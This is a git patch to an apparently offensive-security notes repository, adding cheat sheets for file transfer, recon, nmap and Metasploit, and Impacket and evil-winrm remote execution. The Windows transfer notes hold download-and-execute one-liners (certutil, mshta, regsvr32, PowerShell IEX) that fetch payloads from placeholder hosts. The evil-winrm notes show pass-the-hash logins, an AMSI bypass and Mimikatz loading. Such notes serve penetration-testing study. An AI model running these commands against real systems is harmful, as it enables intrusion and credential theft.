From a36475faa400303567444b9916284ef32f0ed3cd Mon Sep 17 00:00:00 2001 From: 584F525F <584F525F_676974706F6F@01111000011011110111001001011111.com> Date: Sat, 23 Mar 2024 16:28:44 -0400 Subject: [PATCH] content-update --- docs/File Transfers/FTP.md | 74 ++++++ docs/File Transfers/File Transfer.md | 226 ------------------ docs/File Transfers/SMB.md | 25 ++ docs/File Transfers/Telnet.md | 12 + .../Windows mshta wmic regsvr32.md | 32 +++ docs/File Transfers/ftpd.md | 5 + docs/File Transfers/scp.md | 45 ++++ docs/File Transfers/windows - cscript.md | 16 ++ docs/File Transfers/windows certutil.md | 12 + .../Initial Enumeration.md | 25 ++ .../{Cracking Files => }/Cracking Files.md | 0 .../{Decoding => }/Decoding.md | 0 .../{Hashcat => }/Hashcat.md | 0 .../{Hydra => }/Hydra.md | 0 .../{JohnTheRipper => }/JohnTheRipper.md | 0 .../{Medusa => }/Medusa.md | 0 .../Passing the hash.md | 0 .../{Unshadow => }/Unshadow.md | 0 .../{Wordlists => }/Wordlists.md | 0 .../{fcrackzip => }/fcrackzip.md | 0 docs/Recon/recon.md | 24 ++ .../Remote connection & execution.md | 4 +- .../Reverse Shell.md | 0 .../atexec.py.md | 8 + .../atexec.py/atexec.py.md | 1 - .../dcomexec.py.md | 9 + .../dcomexec.py/dcomexec.py.md | 1 - .../evil-winrm.md | 51 ++++ .../evil-winrm/evil-winrm.md | 1 - .../psexec.py.md | 9 + .../psexec.py/psexec.py.md | 1 - .../smbexec.py.md | 11 + .../smbexec.py/smbexec.py.md | 1 - docs/Remote connection & execution/winrm.md | 12 + .../winrm/winrm.md | 1 - .../wmiexec.py.md | 9 + .../wmiexec.py/wmiexec.py.md | 1 - docs/Services/{FTP => }/FTP.md | 0 docs/Services/{IMAP => }/IMAP.md | 0 docs/Services/{MSSQL => }/MSSQL.md | 0 docs/Services/{POP3 => }/POP3.md | 0 .../Services/{SAMBA - SMB => }/SAMBA - SMB.md | 0 docs/Services/{SMTP => }/SMTP.md | 0 docs/Services/Services.md | 2 +- docs/Web/{IDOR => }/IDOR.md | 0 .../RFI-LFI File Inclusion.md | 0 .../{Command Injection => }/SQL Injection.md | 0 docs/Web/SQL Injection/SQL Injection.md | 1 - docs/Web/{SSRF => }/SSRF.md | 0 .../XSS (Cross-Site Scripting).md | 0 50 files changed, 383 insertions(+), 236 deletions(-) create mode 100644 docs/File Transfers/FTP.md delete mode 100644 docs/File Transfers/File Transfer.md create mode 100644 docs/File Transfers/SMB.md create mode 100644 docs/File Transfers/Telnet.md create mode 100644 docs/File Transfers/Windows mshta wmic regsvr32.md create mode 100644 docs/File Transfers/ftpd.md create mode 100644 docs/File Transfers/scp.md create mode 100644 docs/File Transfers/windows - cscript.md create mode 100644 docs/File Transfers/windows certutil.md rename docs/Password Attacks, Cracking & Decoding/{Cracking Files => }/Cracking Files.md (100%) rename docs/Password Attacks, Cracking & Decoding/{Decoding => }/Decoding.md (100%) rename docs/Password Attacks, Cracking & Decoding/{Hashcat => }/Hashcat.md (100%) rename docs/Password Attacks, Cracking & Decoding/{Hydra => }/Hydra.md (100%) rename docs/Password Attacks, Cracking & Decoding/{JohnTheRipper => }/JohnTheRipper.md (100%) rename docs/Password Attacks, Cracking & Decoding/{Medusa => }/Medusa.md (100%) rename docs/Password Attacks, Cracking & Decoding/{Passing the hash => }/Passing the hash.md (100%) rename docs/Password Attacks, Cracking & Decoding/{Unshadow => }/Unshadow.md (100%) rename docs/Password Attacks, Cracking & Decoding/{Wordlists => }/Wordlists.md (100%) rename docs/Password Attacks, Cracking & Decoding/{fcrackzip => }/fcrackzip.md (100%) create mode 100644 docs/Recon/recon.md rename docs/{Reverse Shell => Remote connection & execution}/Reverse Shell.md (100%) create mode 100644 docs/Remote connection & execution/atexec.py.md delete mode 100644 docs/Remote connection & execution/atexec.py/atexec.py.md create mode 100644 docs/Remote connection & execution/dcomexec.py.md delete mode 100644 docs/Remote connection & execution/dcomexec.py/dcomexec.py.md create mode 100644 docs/Remote connection & execution/evil-winrm.md delete mode 100644 docs/Remote connection & execution/evil-winrm/evil-winrm.md create mode 100644 docs/Remote connection & execution/psexec.py.md delete mode 100644 docs/Remote connection & execution/psexec.py/psexec.py.md create mode 100644 docs/Remote connection & execution/smbexec.py.md delete mode 100644 docs/Remote connection & execution/smbexec.py/smbexec.py.md create mode 100644 docs/Remote connection & execution/winrm.md delete mode 100644 docs/Remote connection & execution/winrm/winrm.md create mode 100644 docs/Remote connection & execution/wmiexec.py.md delete mode 100644 docs/Remote connection & execution/wmiexec.py/wmiexec.py.md rename docs/Services/{FTP => }/FTP.md (100%) rename docs/Services/{IMAP => }/IMAP.md (100%) rename docs/Services/{MSSQL => }/MSSQL.md (100%) rename docs/Services/{POP3 => }/POP3.md (100%) rename docs/Services/{SAMBA - SMB => }/SAMBA - SMB.md (100%) rename docs/Services/{SMTP => }/SMTP.md (100%) rename docs/Web/{IDOR => }/IDOR.md (100%) rename docs/Web/{RFI-LFI File Inclusion => }/RFI-LFI File Inclusion.md (100%) rename docs/Web/{Command Injection => }/SQL Injection.md (100%) delete mode 100644 docs/Web/SQL Injection/SQL Injection.md rename docs/Web/{SSRF => }/SSRF.md (100%) rename docs/Web/{XSS (Cross-Site Scripting) => }/XSS (Cross-Site Scripting).md (100%) diff --git a/docs/File Transfers/FTP.md b/docs/File Transfers/FTP.md new file mode 100644 index 000000000..24c2e20b4 --- /dev/null +++ b/docs/File Transfers/FTP.md @@ -0,0 +1,74 @@ +### FTP - File Transfer Protocol + +#### commands + +```bash +ftp ip_address +#enter username +#enter password + +#print working directory +pwd + +#list file in directory +ls + +#change working directory +cd /dir/dir +cd ../dir +cd .. +cdup + +#creating directory +mkdir new_dir + +#removing directory +rmdir new_dir + +#change transfer mode +ascii #suitable for transferring text data such as HTML files. +binary # + +#download and upload a file +get Download.txt +put Upload.txt + +#download upload multiple files +mget *.txt +mget file?.txt file?.zip +mput file.jpg file.jpg +mput *.zip + +#delete file | multiple files +delete file.zip +mdelete *.zip + +#rename a file +rename name.txt new_name.txt + +# append remote file data +append new_data.sh old_data.sh + +#change file permissions +chmod 777 file.sh +chmod +x file.sh + +#to exit +bye +exit +quit +``` + +#### switches + +```bash +-4 Use only IPv4 to contact any host. +-6 Use IPv6 only. +-e Disables command editing and history support, if it was compiled into the ftp executable. Otherwise, it does nothing. +-p Use passive mode for data transfers. Allows the use of ftp in environments where a firewall prevents connections from the outside world back to the client machine. Requires the ftp server to support the PASV command . +-i Turns off interactive prompting during multiple file transfers. +-n Restrains ftp from attempting auto-login upon initial connection. If auto-login is enabled, ftp checks the .netrc (see netrc ) file in the user’s home directory for an entry describing an account on the remote machine. If no entry exists, ftp prompts for the remote machine login name (the default is the user identity on the local machine), and, if necessary, prompt for a password and an account with which to login. +-g Disables file name globbing. +-v The verbose option forces ftp to show all responses from the remote server, as well as report on data transfer statistics. +-d Enables debugging. +``` \ No newline at end of file diff --git a/docs/File Transfers/File Transfer.md b/docs/File Transfers/File Transfer.md deleted file mode 100644 index 1b44a8693..000000000 --- a/docs/File Transfers/File Transfer.md +++ /dev/null @@ -1,226 +0,0 @@ -### Telnet - -```bash -telnet ip_address -ls -PASV -TYPE A -STAT -get Download.txt -put Upload.txt -Exit -``` - -### FTP - File Transfer Protocol - -#### commands - -```bash -ftp ip_address -#enter username -#enter password - -#print working directory -pwd - -#list file in directory -ls - -#change working directory -cd /dir/dir -cd ../dir -cd .. -cdup - -#creating directory -mkdir new_dir - -#removing directory -rmdir new_dir - -#change transfer mode -ascii #suitable for transferring text data such as HTML files. -binary # - -#download and upload a file -get Download.txt -put Upload.txt - -#download upload multiple files -mget *.txt -mget file?.txt file?.zip -mput file.jpg file.jpg -mput *.zip - -#delete file | multiple files -delete file.zip -mdelete *.zip - -#rename a file -rename name.txt new_name.txt - -# append remote file data -append new_data.sh old_data.sh - -#change file permissions -chmod 777 file.sh -chmod +x file.sh - -#to exit -bye -exit -quit -``` - -#### switches - -```bash --4 Use only IPv4 to contact any host. --6 Use IPv6 only. --e Disables command editing and history support, if it was compiled into the ftp executable. Otherwise, it does nothing. --p Use passive mode for data transfers. Allows the use of ftp in environments where a firewall prevents connections from the outside world back to the client machine. Requires the ftp server to support the PASV command . --i Turns off interactive prompting during multiple file transfers. --n Restrains ftp from attempting auto-login upon initial connection. If auto-login is enabled, ftp checks the .netrc (see netrc ) file in the user’s home directory for an entry describing an account on the remote machine. If no entry exists, ftp prompts for the remote machine login name (the default is the user identity on the local machine), and, if necessary, prompt for a password and an account with which to login. --g Disables file name globbing. --v The verbose option forces ftp to show all responses from the remote server, as well as report on data transfer statistics. --d Enables debugging. -``` - -### SCP - Secure Copy Protocol - -#### commands - -```shell -scp -scp o s_path d_path - -#specifying port with -P -scp -P 5562 file @: -scp -P 5562 f? u@ip:r_file_path - -# uploading a file -scp file @: -scp file u@ip:r_file_path - -# uploading multiple files -scp file1 file2 @: -scp f? f? u@ip:r_dir_path - -# downloading a file -scp @: -scp u@ip:r_file_path l_file_path - -# downloading multiple files -scp @: . -scp u@ip:dir_path/\f?,f? . - -# downloading a directory -scp -r @: -scp -r l_dir_path u@ip:r_dir_path -``` - -#### switches - -```shell --r # transfer directory --v # see the transfer details --C # copy files with compression --l 800 # limit bandwidth with 800 --p # preserving the original attributes of the copied files --P # connection port --q # hidden the output -``` - -### certutil - windows powershell - -```powershell -# Multiple ways to download and execute files: -certutil -urlcache -split -f http://webserver/payload payload - -# Execute a specific .dll: -certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll - -# Execute an .exe: -certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe -``` - -### cscript - windows powershell -```powershell -# Execute file from a WebDav server: -cscript //E:jscript \\IP\folder\payload.txt - -# Download using wget.vbs -cscript wget.vbs http://IP/file.exe file.exe - -# One liner download file from WebServer: -powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex" -powershell -exec bypass -c "(new-object System.Net.WebClient).DownloadFile('http://IP/file.exe','C:\Users\user\Desktop\file.exe')" - -# Download from WebDAV Server: -powershell -exec bypass -f \\IP\folder\payload.ps1 -``` - -### Windows mshta wmic regsvr32 -```powershell -# Method 1 -mshta vbscript:Close(Execute("GetObject(""script:http://IP/payload.sct"")")) - -# Method 2 -mshta http://IP/payload.hta - -# Method 3 (Using WebDav) -mshta \\IP\payload.hta - -#Download and execute XSL using wmic -wmic os get /format:"https://webserver/payload.xsl" - - -# Download and execute over a WebServer: -regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll - -# Using WebDAV -regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll - -# Powershell Cmdlet -Invoke-WebRequest "https://server/filename" -OutFile "C:\Windows\Temp\filename" - -# Powershell One-Line -(New-Object System.Net.WebClient).DownloadFile("https://server/filename", "C:\Windows\Temp\filename") - -# In Memory Execution -IEX(New-Object Net.WebClient).downloadString('http://server/script.ps1') -``` - -### SMB -```bash -# Set up a SMB server using smbserver.py from impacket -smbserver.py SHARE_NAME path/to/share - -# From target Windows: -net view \\KALI_IP -(Should display the SHARE_NAME) - -dir \\KALI_IP\SHARE_NAME -copy \\KALI_IP\SHARE_NAME\file.exe . - -# Looking at smbserver logs you also grab the NTLMv2 hashes of your current Windows user -# can be usefull to PTH, or crack passwords - -# Since Windows 10, you can't do anonymous smb server anymore -sudo python smbserver.py SDFR /BloodHound/Ingestors -smb2support -username "peon" -password "peon" -net use Z: \\192.168.30.130\SDFR /user:peon peon -net use Z: /delete /y -``` - -```bash -impacket smbserver -net use z: \\attackerip\sharename -``` - - -### ftpd - -```shell -/etc/init.d/pure-ftpd -``` - diff --git a/docs/File Transfers/SMB.md b/docs/File Transfers/SMB.md new file mode 100644 index 000000000..c5409225c --- /dev/null +++ b/docs/File Transfers/SMB.md @@ -0,0 +1,25 @@ +### SMB +```bash +# Set up a SMB server using smbserver.py from impacket +smbserver.py SHARE_NAME path/to/share + +# From target Windows: +net view \\KALI_IP +(Should display the SHARE_NAME) + +dir \\KALI_IP\SHARE_NAME +copy \\KALI_IP\SHARE_NAME\file.exe . + +# Looking at smbserver logs you also grab the NTLMv2 hashes of your current Windows user +# can be usefull to PTH, or crack passwords + +# Since Windows 10, you can't do anonymous smb server anymore +sudo python smbserver.py SDFR /BloodHound/Ingestors -smb2support -username "peon" -password "peon" +net use Z: \\192.168.30.130\SDFR /user:peon peon +net use Z: /delete /y +``` + +```bash +impacket smbserver +net use z: \\attackerip\sharename +``` \ No newline at end of file diff --git a/docs/File Transfers/Telnet.md b/docs/File Transfers/Telnet.md new file mode 100644 index 000000000..e745d99df --- /dev/null +++ b/docs/File Transfers/Telnet.md @@ -0,0 +1,12 @@ +### Telnet + +```bash +telnet ip_address +ls +PASV +TYPE A +STAT +get Download.txt +put Upload.txt +Exit +``` diff --git a/docs/File Transfers/Windows mshta wmic regsvr32.md b/docs/File Transfers/Windows mshta wmic regsvr32.md new file mode 100644 index 000000000..59213f8b3 --- /dev/null +++ b/docs/File Transfers/Windows mshta wmic regsvr32.md @@ -0,0 +1,32 @@ + +### Windows mshta wmic regsvr32 + +```powershell +# Method 1 +mshta vbscript:Close(Execute("GetObject(""script:http://IP/payload.sct"")")) + +# Method 2 +mshta http://IP/payload.hta + +# Method 3 (Using WebDav) +mshta \\IP\payload.hta + +#Download and execute XSL using wmic +wmic os get /format:"https://webserver/payload.xsl" + + +# Download and execute over a WebServer: +regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll + +# Using WebDAV +regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll + +# Powershell Cmdlet +Invoke-WebRequest "https://server/filename" -OutFile "C:\Windows\Temp\filename" + +# Powershell One-Line +(New-Object System.Net.WebClient).DownloadFile("https://server/filename", "C:\Windows\Temp\filename") + +# In Memory Execution +IEX(New-Object Net.WebClient).downloadString('http://server/script.ps1') +``` \ No newline at end of file diff --git a/docs/File Transfers/ftpd.md b/docs/File Transfers/ftpd.md new file mode 100644 index 000000000..84db5235a --- /dev/null +++ b/docs/File Transfers/ftpd.md @@ -0,0 +1,5 @@ +### ftpd + +```shell +/etc/init.d/pure-ftpd +``` \ No newline at end of file diff --git a/docs/File Transfers/scp.md b/docs/File Transfers/scp.md new file mode 100644 index 000000000..79dc03aff --- /dev/null +++ b/docs/File Transfers/scp.md @@ -0,0 +1,45 @@ +### SCP - Secure Copy Protocol + +#### commands + +```shell +scp +scp o s_path d_path + +#specifying port with -P +scp -P 5562 file @: +scp -P 5562 f? u@ip:r_file_path + +# uploading a file +scp file @: +scp file u@ip:r_file_path + +# uploading multiple files +scp file1 file2 @: +scp f? f? u@ip:r_dir_path + +# downloading a file +scp @: +scp u@ip:r_file_path l_file_path + +# downloading multiple files +scp @: . +scp u@ip:dir_path/\f?,f? . + +# downloading a directory +scp -r @: +scp -r l_dir_path u@ip:r_dir_path +``` + +#### switches + +```shell +-r # transfer directory +-v # see the transfer details +-C # copy files with compression +-l 800 # limit bandwidth with 800 +-p # preserving the original attributes of the copied files +-P # connection port +-q # hidden the output +``` + diff --git a/docs/File Transfers/windows - cscript.md b/docs/File Transfers/windows - cscript.md new file mode 100644 index 000000000..9f545dccf --- /dev/null +++ b/docs/File Transfers/windows - cscript.md @@ -0,0 +1,16 @@ +### cscript - windows powershell + +```powershell +# Execute file from a WebDav server: +cscript //E:jscript \\IP\folder\payload.txt + +# Download using wget.vbs +cscript wget.vbs http://IP/file.exe file.exe + +# One liner download file from WebServer: +powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex" +powershell -exec bypass -c "(new-object System.Net.WebClient).DownloadFile('http://IP/file.exe','C:\Users\user\Desktop\file.exe')" + +# Download from WebDAV Server: +powershell -exec bypass -f \\IP\folder\payload.ps1 +``` diff --git a/docs/File Transfers/windows certutil.md b/docs/File Transfers/windows certutil.md new file mode 100644 index 000000000..347ec95cd --- /dev/null +++ b/docs/File Transfers/windows certutil.md @@ -0,0 +1,12 @@ +### certutil - windows powershell + +```powershell +# Multiple ways to download and execute files: +certutil -urlcache -split -f http://webserver/payload payload + +# Execute a specific .dll: +certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll + +# Execute an .exe: +certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe +``` diff --git a/docs/Initial Enumeration/Initial Enumeration.md b/docs/Initial Enumeration/Initial Enumeration.md index e69de29bb..3f1550456 100644 --- a/docs/Initial Enumeration/Initial Enumeration.md +++ b/docs/Initial Enumeration/Initial Enumeration.md @@ -0,0 +1,25 @@ +# nmap + +```shell +sudo nmap -sV -A --min-rate 1500 x.x.x.x +sudo nmap -p x,x,x --script vuln x.x.x.x +``` + +# metasploit +```shell +systemctl start postgresql +msfdb init +msfconsole +db_status +workspace -a +workspace + +db_nmap -sV -A -p- x.x.x.x +hosts +services +vulns + +``` + +# Nikto +[Nikto web server scanner](https://github.com/sullo/nikto) diff --git a/docs/Password Attacks, Cracking & Decoding/Cracking Files/Cracking Files.md b/docs/Password Attacks, Cracking & Decoding/Cracking Files.md similarity index 100% rename from docs/Password Attacks, Cracking & Decoding/Cracking Files/Cracking Files.md rename to docs/Password Attacks, Cracking & Decoding/Cracking Files.md diff --git a/docs/Password Attacks, Cracking & Decoding/Decoding/Decoding.md b/docs/Password Attacks, Cracking & Decoding/Decoding.md similarity index 100% rename from docs/Password Attacks, Cracking & Decoding/Decoding/Decoding.md rename to docs/Password Attacks, Cracking & Decoding/Decoding.md diff --git a/docs/Password Attacks, Cracking & Decoding/Hashcat/Hashcat.md b/docs/Password Attacks, Cracking & Decoding/Hashcat.md similarity index 100% rename from docs/Password Attacks, Cracking & Decoding/Hashcat/Hashcat.md rename to docs/Password Attacks, Cracking & Decoding/Hashcat.md diff --git a/docs/Password Attacks, Cracking & Decoding/Hydra/Hydra.md b/docs/Password Attacks, Cracking & Decoding/Hydra.md similarity index 100% rename from docs/Password Attacks, Cracking & Decoding/Hydra/Hydra.md rename to docs/Password Attacks, Cracking & Decoding/Hydra.md diff --git a/docs/Password Attacks, Cracking & Decoding/JohnTheRipper/JohnTheRipper.md b/docs/Password Attacks, Cracking & Decoding/JohnTheRipper.md similarity index 100% rename from docs/Password Attacks, Cracking & Decoding/JohnTheRipper/JohnTheRipper.md rename to docs/Password Attacks, Cracking & Decoding/JohnTheRipper.md diff --git a/docs/Password Attacks, Cracking & Decoding/Medusa/Medusa.md b/docs/Password Attacks, Cracking & Decoding/Medusa.md similarity index 100% rename from docs/Password Attacks, Cracking & Decoding/Medusa/Medusa.md rename to docs/Password Attacks, Cracking & Decoding/Medusa.md diff --git a/docs/Password Attacks, Cracking & Decoding/Passing the hash/Passing the hash.md b/docs/Password Attacks, Cracking & Decoding/Passing the hash.md similarity index 100% rename from docs/Password Attacks, Cracking & Decoding/Passing the hash/Passing the hash.md rename to docs/Password Attacks, Cracking & Decoding/Passing the hash.md diff --git a/docs/Password Attacks, Cracking & Decoding/Unshadow/Unshadow.md b/docs/Password Attacks, Cracking & Decoding/Unshadow.md similarity index 100% rename from docs/Password Attacks, Cracking & Decoding/Unshadow/Unshadow.md rename to docs/Password Attacks, Cracking & Decoding/Unshadow.md diff --git a/docs/Password Attacks, Cracking & Decoding/Wordlists/Wordlists.md b/docs/Password Attacks, Cracking & Decoding/Wordlists.md similarity index 100% rename from docs/Password Attacks, Cracking & Decoding/Wordlists/Wordlists.md rename to docs/Password Attacks, Cracking & Decoding/Wordlists.md diff --git a/docs/Password Attacks, Cracking & Decoding/fcrackzip/fcrackzip.md b/docs/Password Attacks, Cracking & Decoding/fcrackzip.md similarity index 100% rename from docs/Password Attacks, Cracking & Decoding/fcrackzip/fcrackzip.md rename to docs/Password Attacks, Cracking & Decoding/fcrackzip.md diff --git a/docs/Recon/recon.md b/docs/Recon/recon.md new file mode 100644 index 000000000..3ae97ee41 --- /dev/null +++ b/docs/Recon/recon.md @@ -0,0 +1,24 @@ +# recon + +[DNSdumpster](https://dnsdumpster.com/) +[Shodan.io](https://www.shodan.io/) + +```shell +whois +ping +telnet +traceroute +nc +``` + +```shell +#We can use the favicon link of a website to find the framework used +curl https://website.com/favicon.ico | md5sum +#this calculates md5 hash value after downloading the favicon +#hash can be used to lookup on +``` + +```shell +#Manually discovering HTTP headers +curl http://website.com/ -v +``` diff --git a/docs/Remote connection & execution/Remote connection & execution.md b/docs/Remote connection & execution/Remote connection & execution.md index 8318c86b3..d8542a146 100644 --- a/docs/Remote connection & execution/Remote connection & execution.md +++ b/docs/Remote connection & execution/Remote connection & execution.md @@ -1 +1,3 @@ -Test \ No newline at end of file +> Resources +[Impacket – SecureAuth](https://www.secureauth.com/labs/open-source-tools/impacket/) +[Offensive Security Cheatsheet](https://cheatsheet.haax.fr/windows-systems/exploitation/remote_execution_techniques/) diff --git a/docs/Reverse Shell/Reverse Shell.md b/docs/Remote connection & execution/Reverse Shell.md similarity index 100% rename from docs/Reverse Shell/Reverse Shell.md rename to docs/Remote connection & execution/Reverse Shell.md diff --git a/docs/Remote connection & execution/atexec.py.md b/docs/Remote connection & execution/atexec.py.md new file mode 100644 index 000000000..722635abf --- /dev/null +++ b/docs/Remote connection & execution/atexec.py.md @@ -0,0 +1,8 @@ +# atexec.py + +This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command. + +```shell +# This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command. +atexec.py domain/user:password@IP +``` diff --git a/docs/Remote connection & execution/atexec.py/atexec.py.md b/docs/Remote connection & execution/atexec.py/atexec.py.md deleted file mode 100644 index 8318c86b3..000000000 --- a/docs/Remote connection & execution/atexec.py/atexec.py.md +++ /dev/null @@ -1 +0,0 @@ -Test \ No newline at end of file diff --git a/docs/Remote connection & execution/dcomexec.py.md b/docs/Remote connection & execution/dcomexec.py.md new file mode 100644 index 000000000..cf343c7f0 --- /dev/null +++ b/docs/Remote connection & execution/dcomexec.py.md @@ -0,0 +1,9 @@ +# dcomexec.py + +A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects. + +```shell +# A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. +## Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects. +dcomexec.py domain/user:password@IP +``` diff --git a/docs/Remote connection & execution/dcomexec.py/dcomexec.py.md b/docs/Remote connection & execution/dcomexec.py/dcomexec.py.md deleted file mode 100644 index 8318c86b3..000000000 --- a/docs/Remote connection & execution/dcomexec.py/dcomexec.py.md +++ /dev/null @@ -1 +0,0 @@ -Test \ No newline at end of file diff --git a/docs/Remote connection & execution/evil-winrm.md b/docs/Remote connection & execution/evil-winrm.md new file mode 100644 index 000000000..4aaf05eac --- /dev/null +++ b/docs/Remote connection & execution/evil-winrm.md @@ -0,0 +1,51 @@ +# evil-winrm + +```shell +#install - Ruby +gem install evil-winrm + +#example +evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' + +#enable SSL +evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s + +#Login with NTLM Hash -Pass The Hash Attack +evil-winrm -i 192.168.1.19 -u administrator -H 32196B56FFE6F45E294117B91A83BF38 + +#Login with the key using Evil-winrm +evil-winrm -i 10.129.227.105 -c certificate.pem -k priv-key.pem -S + +#Load Powershell Script - example with mimikatz.ps1 +evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -s /opt/privsc/powershell +Bypass-4MSI +Invoke-Mimikatz.ps1 +Invoke-Mimikatz + +#Store logs with Evil-winrm +evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -l + +#Disable Remote Path Completion +evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -N + +#Disable Coloured Interface +evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -n + +#Run Executables File +evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -e /opt/privsc +Bypass-4MSI +menu +Invoke-Binary /opt/privsc/winPEASx64.exe + +#Service Enumeration with Evil-winrm +menu +services + +#File Transfer with Evil-winrm +upload /root/notes.txt . +download notes.txt /root/raj/notes.txt + +#Use Evil-winrm From Docker +docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p 'Ignite@987' + +``` diff --git a/docs/Remote connection & execution/evil-winrm/evil-winrm.md b/docs/Remote connection & execution/evil-winrm/evil-winrm.md deleted file mode 100644 index 8318c86b3..000000000 --- a/docs/Remote connection & execution/evil-winrm/evil-winrm.md +++ /dev/null @@ -1 +0,0 @@ -Test \ No newline at end of file diff --git a/docs/Remote connection & execution/psexec.py.md b/docs/Remote connection & execution/psexec.py.md new file mode 100644 index 000000000..eb2d96283 --- /dev/null +++ b/docs/Remote connection & execution/psexec.py.md @@ -0,0 +1,9 @@ +# psexec.py + +PSEXEC like functionality example using RemComSvc ([https://github.com/kavika13/RemCom](https://github.com/kavika13/RemCom)). + +```shell +# psexec +# PSEXEC like functionality example using RemComSvc(https://github.com/kavika13/RemCom). +psexec.py domain/user:password@IP +``` diff --git a/docs/Remote connection & execution/psexec.py/psexec.py.md b/docs/Remote connection & execution/psexec.py/psexec.py.md deleted file mode 100644 index 8318c86b3..000000000 --- a/docs/Remote connection & execution/psexec.py/psexec.py.md +++ /dev/null @@ -1 +0,0 @@ -Test \ No newline at end of file diff --git a/docs/Remote connection & execution/smbexec.py.md b/docs/Remote connection & execution/smbexec.py.md new file mode 100644 index 000000000..0b6dd8f83 --- /dev/null +++ b/docs/Remote connection & execution/smbexec.py.md @@ -0,0 +1,11 @@ +# smbexec.py + +A similar approach to PSEXEC w/o using RemComSvc. The technique is described [here](https://web.archive.org/web/20140625065218/http://blog.accuvant.com/rdavisaccuvant/owning-computers-without-shell-access/). Our implementation goes one step further, instantiating a local smbserver to receive the output of the commands. This is useful in the situation where the target machine does NOT have a writeable share available. + +```shell +# smbexec +# A similar approach to PSEXEC w/o using RemComSvc. The technique is described here. +# Instantiating a local smbserver to receive the output of the commands. +# This is useful in the situation where the target machine does NOT have a writeable share available. +smbexec.py domain/user:password@IP +``` diff --git a/docs/Remote connection & execution/smbexec.py/smbexec.py.md b/docs/Remote connection & execution/smbexec.py/smbexec.py.md deleted file mode 100644 index 8318c86b3..000000000 --- a/docs/Remote connection & execution/smbexec.py/smbexec.py.md +++ /dev/null @@ -1 +0,0 @@ -Test \ No newline at end of file diff --git a/docs/Remote connection & execution/winrm.md b/docs/Remote connection & execution/winrm.md new file mode 100644 index 000000000..653594a60 --- /dev/null +++ b/docs/Remote connection & execution/winrm.md @@ -0,0 +1,12 @@ +# winrm + +```powershell +#To Enable PSRemoting +Enable-PSRemoting -Force + +#Adding a trusted host +winrm s winrm/config/client '@{TrustedHosts="192.5.2.30"}' + +#running commands +Invoke-Command -ComputerName WINB -ScriptBlock { echo "Hello World"} +``` diff --git a/docs/Remote connection & execution/winrm/winrm.md b/docs/Remote connection & execution/winrm/winrm.md deleted file mode 100644 index 8318c86b3..000000000 --- a/docs/Remote connection & execution/winrm/winrm.md +++ /dev/null @@ -1 +0,0 @@ -Test \ No newline at end of file diff --git a/docs/Remote connection & execution/wmiexec.py.md b/docs/Remote connection & execution/wmiexec.py.md new file mode 100644 index 000000000..3915513f5 --- /dev/null +++ b/docs/Remote connection & execution/wmiexec.py.md @@ -0,0 +1,9 @@ +# winexec.py + +A semi-interactive shell, used through Windows Management Instrumentation. It does not require to install any service/agent at the target server. Runs as Administrator. Highly stealthy. + +```shell +# A semi-interactive shell, used through Windows Management Instrumentation. +# It does not require to install any service/agent at the target server. Runs as Administrator. Highly stealthy. +wmiexec.py domain/user:password@IP +``` diff --git a/docs/Remote connection & execution/wmiexec.py/wmiexec.py.md b/docs/Remote connection & execution/wmiexec.py/wmiexec.py.md deleted file mode 100644 index 8318c86b3..000000000 --- a/docs/Remote connection & execution/wmiexec.py/wmiexec.py.md +++ /dev/null @@ -1 +0,0 @@ -Test \ No newline at end of file diff --git a/docs/Services/FTP/FTP.md b/docs/Services/FTP.md similarity index 100% rename from docs/Services/FTP/FTP.md rename to docs/Services/FTP.md diff --git a/docs/Services/IMAP/IMAP.md b/docs/Services/IMAP.md similarity index 100% rename from docs/Services/IMAP/IMAP.md rename to docs/Services/IMAP.md diff --git a/docs/Services/MSSQL/MSSQL.md b/docs/Services/MSSQL.md similarity index 100% rename from docs/Services/MSSQL/MSSQL.md rename to docs/Services/MSSQL.md diff --git a/docs/Services/POP3/POP3.md b/docs/Services/POP3.md similarity index 100% rename from docs/Services/POP3/POP3.md rename to docs/Services/POP3.md diff --git a/docs/Services/SAMBA - SMB/SAMBA - SMB.md b/docs/Services/SAMBA - SMB.md similarity index 100% rename from docs/Services/SAMBA - SMB/SAMBA - SMB.md rename to docs/Services/SAMBA - SMB.md diff --git a/docs/Services/SMTP/SMTP.md b/docs/Services/SMTP.md similarity index 100% rename from docs/Services/SMTP/SMTP.md rename to docs/Services/SMTP.md diff --git a/docs/Services/Services.md b/docs/Services/Services.md index 8318c86b3..504e96786 100644 --- a/docs/Services/Services.md +++ 